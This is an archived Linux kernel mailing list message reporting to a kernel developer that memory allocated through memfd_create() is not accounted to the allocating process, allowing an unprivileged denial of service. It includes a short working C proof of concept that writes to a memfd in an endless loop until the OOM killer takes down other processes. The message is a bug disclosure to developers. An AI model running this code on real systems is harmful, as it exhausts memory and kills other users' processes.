Possible deny of service with memfd_create()

From: Christian König
Date: Thu Feb 04 2021 - 11:34:02 EST

Next message: Chris Down: "[PATCH] checkpatch: Don't warn about colon termination in linker scripts"
Previous message: Wei Liu: "Re: [PATCH 08/10] clocksource/drivers/hyper-v: Handle sched_clock differences inline"
Next in thread: Michal Hocko: "Re: Possible deny of service with memfd_create()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi Michal,

as requested in the other mail thread the following sample code gets my test system down within seconds.

The issue is that the memory allocated for the file descriptor is not accounted to the process allocating it, so the OOM killer pics whatever process it things is good but never my small test program.

Since memfd_create() doesn't need any special permission this is a rather nice deny of service and as far as I can see also works with a standard Ubuntu 5.4.0-65-generic kernel.

Cheers,
Christian.

#define _GNU_SOURCE
#include <sys/mman.h>
#include <unistd.h>
#include <stdlib.h>

unsigned char page[4096];

int main(void)
{
        int i, fd;

        for (i = 0; i < 4096; ++i)
                page[i] = i;

        fd = memfd_create("test", 0);

        while (1)
                write(fd, page, 4096);
}

Next message: Chris Down: "[PATCH] checkpatch: Don't warn about colon termination in linker scripts"
Previous message: Wei Liu: "Re: [PATCH 08/10] clocksource/drivers/hyper-v: Handle sched_clock differences inline"
Next in thread: Michal Hocko: "Re: Possible deny of service with memfd_create()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]